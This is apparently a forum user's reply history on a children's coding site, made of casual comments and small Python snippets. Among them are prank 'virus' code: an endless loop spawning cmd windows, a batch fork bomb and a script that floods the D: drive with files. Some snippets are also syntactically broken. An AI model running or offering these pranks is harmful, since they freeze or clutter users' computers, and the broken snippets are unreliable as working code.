猫史档案馆


蒟蒻OIer1048576

蒟蒻OIer1048576

Lv.1

只是喜欢Python而已……徒弟:程序侯

获赞:206收藏:39浏览:2002作品收藏:29

签名:只是喜欢Python而已…… 徒弟:程序侯

回复帖子评论
上一页3 页 / 共 60下一页

【Python作品分享】分数评判机【作品秀】 中回复

我输1048576会怎么样???

2020-04-02T18:26:41 点赞:0

【赛事公告】双春鼠计划开启!S5赛季等你闯关,喵了解详情 中回复

if UserName == "1048576电脑号":
    print('恭喜你获得',1048576**60,'源码币')

2020-04-02T18:35:04 点赞:0

【Python作品分享】分数评判机【作品秀】 中回复

score = int(input('请输入你的Python成绩:'))
if 100>=score >= 90:
    print('优秀')
elif score >= 80:
    print('良好')
elif score >= 60:
    print('及格')
elif score>=0:
    print('不及格')
else:
    print('……')

2020-04-02T19:19:13 点赞:0

【Python作品分享】愚人节作品【作品秀】 中回复

……

2020-04-02T20:30:14 点赞:0

【Python作品分享】Python之禅【教程贴】 中回复

import this

2020-04-02T21:12:56 点赞:0

【Python作品分享】Python之禅【教程贴】 中回复

from rhis import *

2020-04-02T21:46:29 点赞:0

【Python作品分享】Python之禅【教程贴】 中回复

import this as Python之禅

2020-04-02T21:46:48 点赞:0

聊天机器人1.0 中回复

V1.1出来了

2020-04-03T09:23:30 点赞:0

【SRbook作品预告】4月16日,不见不散! 中回复

GOODGOOD

2020-04-03T09:47:50 点赞:0

Kitten源代码! 中回复

CSS/JS/H喵L

2020-04-03T10:39:59 点赞:0

我先问一下,手机上的编程猫怎么加背景 中回复

Nemo吗?

2020-04-03T10:41:13 点赞:1

作品评论店(注:不支持书评) 中回复

有人吗?

2020-04-03T10:43:30 点赞:1

作品评论店(注:不支持书评) 中回复

有人吗?

2020-04-03T10:52:30 点赞:0

作品评论店(注:不支持书评) 中回复

有人吗??????

2020-04-03T11:33:35 点赞:0

【Python作品分享】斐波那契数列【作品秀】 中回复

def fib(num)
    aa = 0
    bb = 1
    for i in range(num):
        yield aa
        aa = (aa + bb)
        yield bb
        bb = (aa + bb)
for i in fib(爱填几填几):
    print(i)

2020-04-03T13:57:19 点赞:2

【Python作品分享】【OS模块】嘿嘿嘿,你敢运行吗???【作品秀】 中回复

import os
while 1:
    os.system('start cm'+'d')

2020-04-05T09:19:36 点赞:0

【绝对不水】用所有我会的语言写一遍HelloWorld 中回复

ding!!

.喵d

2020-04-05T09:20:16 点赞:0

【Python作品分享】【OS模块】嘿嘿嘿,你敢运行吗???【作品秀】 中回复

from os import *
system('set /p="%0|%0"<nul>s.bat&s')

2020-04-05T09:23:10 点赞:0

【easy python code开源啦】文件还未托管完成,提前告诉链接 中回复

66

 

2020-04-05T09:24:17 点赞:0

【Python作品分享】花式球体【作品秀】 中回复

import turtle
import time
print('[系统]正在初始化中,请稍后······')
myPen = turtle.Pen()
myPen.speed(0)
colours = ['red', 'orange', 'blue', 'green']
time.sleep(0.5)
print('[系统]正在生成,请稍后······')
for i in range(1, 100):
    print('[系统]{0}%'.format(i))
    myPen.pencolor(colours[(i-1) % 4])
    myPen.circle(50)
    myPen.left(50)

2020-04-05T09:29:10 点赞:0

聊天机器人V1.2 中回复

import random
while 1:
    question = input('你:')
    if (question == '你叫什么' or question == '你是谁'):
        print('AI:我是1048576的使者')
    else:
        print(('AI:' + question.replace('是', random.choice(('是', '不是'))).replace('会',random.choice(('会', '不会'))).replace('有', random.choice(('有', '没有'))).replace('你', '我').喵('??吗').__add__('!')))

2020-04-05T09:40:31 点赞:0

【Python作品分享】mc kanmp 我的世界代码【作品秀】 中回复

JS?JSON?PYTHON?C?JAVA?

2020-04-05T09:43:11 点赞:0

【Python作品分享】系统错误,系统喵机【教程贴】 中回复

from os import *
while 1:
    system('start cmd')

2020-04-05T09:51:51 点赞:0

【Python作品分享】大黄鸡的发动机【作业帖】 中回复

@_@

^_^

b_d

눈_눈

┛┏

2020-04-05T09:54:10 点赞:0

【史上超级喵最最最强攻略!】随机汉字 中回复

ddd

2020-04-05T10:18:19 点赞:0

【史上超级喵最最最强攻略!】随机汉字 中回复

顶顶顶顶

2020-04-05T10:18:34 点赞:0

【Python作品分享】此电脑(病毒)(喵产品)【作品秀】 中回复

for i in range(666):
    with open('D:\你的电脑已死机'+str(i)+'次','w') as file:
        f.write('你的电脑已死机')

2020-04-05T13:34:47 点赞:0

恭喜官方晋级LV4大神工作室 中回复

必须开发无限云变量+无限云空间+私有云列表+对象+正则表达式,且在4月3日开发完毕

2020-04-05T16:13:32 点赞:0

我要投诉! 中回复

我妈

2020-04-05T16:19:33 点赞:0

66666666 中回复

666

 

2020-04-05T16:56:10 点赞:0